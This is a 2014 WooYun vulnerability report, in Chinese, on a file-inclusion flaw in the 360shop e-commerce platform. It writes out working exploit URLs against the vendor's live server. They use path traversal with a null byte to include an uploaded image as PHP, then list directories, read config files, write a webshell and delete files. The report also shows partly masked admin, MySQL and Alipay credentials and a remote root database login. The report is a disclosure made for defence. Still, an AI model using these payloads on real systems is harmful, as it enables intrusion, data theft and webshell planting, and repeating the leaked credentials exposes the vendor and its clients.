当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048045

漏洞标题:360shop文件包含漏洞发生的一场血案可导致服务器沦陷

相关厂商:杭州启博科技

漏洞作者: 秋风

提交时间:2014-01-06 17:04

修复时间:2014-01-11 17:05

公开时间:2014-01-11 17:05

漏洞类型:文件包含

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

0#文件包含漏洞(空字符注入类型)常规打法一般都是包含各类log文件。这次利用时发现找不到一个有用的log文件。。。。。。于是乎放了几天,没继续测了!
1#一晚做梦时,梦到我用PHP include了一个用户头像,哇咔咔,醒来后果断寻找有图片上传的地方。到前台注册用户后,发现尼玛没有一个可以上传图片的地方!去后台瞅瞅?俺就不信后台没提供上传图片。。。

详细说明:

#0信息收集
www.qiboot.com
www.360shop.com.cn
这俩域名所属同一ip,暂且猜测服务脚本也在同一台机器上!

qiufeng@ubuntu:/tmp$ ping www.qiboot.com
PING www.qiboot.com (202.75.216.198) 56(84) bytes of data.
64 bytes from 202.75.216.198: icmp_req=1 ttl=50 time=8.17 ms
...
qiufeng@ubuntu:/tmp$ ping www.360shop.com.cn
PING www.360shop.com.cn (202.75.216.198) 56(84) bytes of data.
64 bytes from 202.75.216.198: icmp_req=1 ttl=50 time=12.9 ms
...


泄露绝对路径

Warning: preg_match() [function.preg-match]: Unknown modifier '.' in /bootqi/apache2/htdocs/vhost/company/qiboot/header.php on line 98


.png


泄露用户名密码(进后台主要为了上传带特定码的图片,为后面攻击做铺垫)

http://www.qiboot.com/admin/login.php
username: demohu@gmail.com
password: 43******31


弱密码。。。。是病,得治!

.png


可控图片相对路径(1388986954为动态,上传图片后可获得)
http://www.qiboot.com/upload/linkimg/1388986954.jpg
得到相对路径"upload/linkimg/1388986954.jpg"

.png


#0拿泄露的绝对路径信息进行猜测得图片绝对路径如下:
/bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg
访问该地址,有乱码数据返回则正常

http://www.qiboot.com/?mod=product&do=../../../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00


.png


#1打印目录及文件,可修改参数d的值扫描整站

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@scandir($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/company
>>/bootqi/apache2/htdocs/vhost/company目录文件打印结果
Array
(
[0] => .
[1] => ..
[2] => crm
[3] => fushi
[4] => help
[5] => help_hicloud
[6] => help_hicloud.zip
[7] => help_tltw
[8] => help_tltw.zip
[9] => hotel
[10] => lyf
[11] => newcom
[12] => newcom20130326.zip
[13] => newshop
[14] => qiboot
[15] => zuanshi
)
下面这个目测是给客户部署的服务
http://www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@scandir($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/vhostsite
>>/bootqi/apache2/htdocs/vhost/vhostsite目录文件打印结果
Array
(
[0] => .
[1] => ..
[2] => 171688.cn
[3] => badbuildfs
[4] => bugfree
[5] => company
[6] => domain
[7] => faq
[8] => grep.txt
[9] => helpcenter
[10] => hotel_
[11] => kehu
[12] => lyf
[13] => netdesk
[14] => newcom
[15] => newcom__2012-02
[16] => pagenotfind
[17] => qcom
[18] => qiboot
[19] => taodiantong
[20] => wddl.cn
[21] => zjtggroup
[22] => zjtggroup_20120619
[23] => zjtggroup_temp
)


#2查看文件,可修改参数d的值查看整站文件

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@file_get_contents($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/company/newshop/conf/config.php
获取文件信息如下:
<?php
if ( !defined('IN_EB') )
{
die("Hacking attempt");
}
if (PHP_OS == 'WINNT')
{
/**
* 数据库主机
*/
$dbhost = 'localhost';
$dbport = '3306';
$dbuser = "root";
$dbpass = "";
$dbname = "360_newshop";
$table_prefix = "eb_";
$dbtype = "mysql4";
$acm_type = 'file';


/**
* 远程配置
*/
$az_prefix = 'eb';
$az_dbhost = 'localhost';
$az_dbuser = 'root';
$az_dbpass = '';
$az_dbname = 'abc_appaz';
#$az_install = 'http://appaz.test.com/install.php';
#$az_domain = 'http://appaz.test.com';
$az_install = 'http://qudao.v2.taodiantong.cn/install.php';
$az_domain = 'http://qudao.v2.taodiantong.cn/install.php';
}
else
{

/**
* 数据库主机
*/
$dbhost = 'localhost';
$dbport = '3306';
$dbuser = "root";
$dbpass = "qi************hop";
$dbname = "360_ncom";
$table_prefix = "eb_";
$dbtype = "mysql4";
$acm_type = 'file';


/**
* 远程配置
*/
$az_prefix = 'eb';
$az_dbhost = '122.224.72.216';
$az_dbuser = 'az*****ll';
$az_dbpass = 'az2**********c871K';
$az_dbname = 'abc_appaz';
#$az_install = 'http://qudao.taodiantong.cn/install.php';
$az_install = 'http://qudao.v2.taodiantong.cn/install.php';
$az_domain = 'http://fuwu.taodiantong.cn';


}
$pay_config = array(
'alipay_key' => 'zrbh**********16alsto5',
'alipay_partner'=> '2088*******250',
'alipay_account'=> 'alipay@360eb.com'
);
?>


2.png


#3写入传说中的webshell,参数d为内容,n为文件名

利用:
www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=file_put_contents(@$_GET[n],@$_GET[d]);&d=by:wooyun.org&n=/bootqi/apache2/htdocs/vhost/company/newshop/wooyun.org.php
对应文件地址:
http://www.360shop.com.cn/wooyun.org.txt


webshell.png


#4删除文件,参数n为文件名

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=unlink(@$_GET[n]);&n=/bootqi/apache2/htdocs/vhost/company/newshop/wooyun.org.txt


测试下#2所泄露的mysql用户root能否登陆,不测本地,测远程!发现居然没禁止远程登陆。。。。。。坚决不脫裤子!

qiufeng@ubuntu:/tmp$ nmap 202.75.216.198 -p 3306
Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-06 15:02 CST
Nmap scan report for 202.75.216.198
Host is up (0.0081s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
qiufeng@ubuntu:/tmp$ mysql -h 202.75.216.198 -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1218931
Server version: 5.0.95 Source distribution
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+------------------------------+
| Database |
+------------------------------+
| information_schema |
| 360_89lou |
| 360_89lou_0818 |
| 360_canglong |
| 360_canglong_0927 |
| 360_canglong_1104 |
| 360_canglong_1112 |
| 360_crm |
| 360_help |
| 360_help_hicloud |
| 360_help_tltw |
| 360_hotel |
| 360_ncom |
| 360_newshop |
| 360_qiboot |
| 360_tcrm |
| 360_www_bandao_com |
| 3800_www_tomatoc_com |
| 51_ml |
| 8800_www_mylianmei_com |
| 8800_www_onespacetwofoot_com |
| 8800_www_yibuerzu_com |
| a_men_discuz |
| a_myzs |
| a_myzs_20120401 |
| a_sanude |
| a_skpifa_wordpress |
| a_tltest |
| abc_appaz |
| abc_appaz_0613 |
| abc_appaz_20111031 |
| abc_appaz_fx |
| abc_lsa |
| abc_taodiantong |
| ali_glsp8_com |
| ali_goucoo_com |
| ali_shuinianhua_com |
| aliefday_360shop_cc |
| alihanxianzi_360shop_cc |
| alilgg360_360shop_cc |
| app_01008034 |
| app_02263 |
| app_02632 |
| app_02633 |
| app_02634 |
| app_02635 |
| app_0618 |
| app_1301 |
| app_1307525362 |
| app_2370 |
| app_2371 |
| app_2447 |
| app_2449 |
| app_3803 |
| app_4370 |
| app_5163 |
| app_6395 |
| app_7287 |
| app_8298 |
| app_9954 |
| app_9954_20120829 |
| badbuildfs |
| bugfree2 |
| bz_meimeivip_com |
| bzelf520_360shop_cc |
| bzmagic_szjieli_com |
| bzmimidf_360shop_cc |
| daohang_171688_cn |
| daohang_wddl_cn |
| mysql |
| netdesk |
| son1308030959 |
| son1318995965 |
| son2633 |
| son2634 |
| son2638 |
| v2_lovelens_com |
| v2_mingdi_net |
| v2powerfeel_360shop_cc |
| v2soso2099_360shop_cc |
| v2xinyi521_360shop_cc |
| www_myvip8_com |
| www_yibuerzu_com |
| zjtggroup |
| zjtggroup_0619 |
+------------------------------+
85 rows in set (0.01 sec)


被偷梁换柱的图片文件绝对地址:/bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg
请厂商自行删除||替换
声明:测试所写入的文件本人已删除,建议扫描一下整站。

漏洞证明:

webshell.png

修复方案:

1.过滤
2.mysql建议只对内网开放
3.全站审查

版权声明:转载请注明来源 秋风@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-11 17:05

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

2014-01-13:谢谢,马上就治!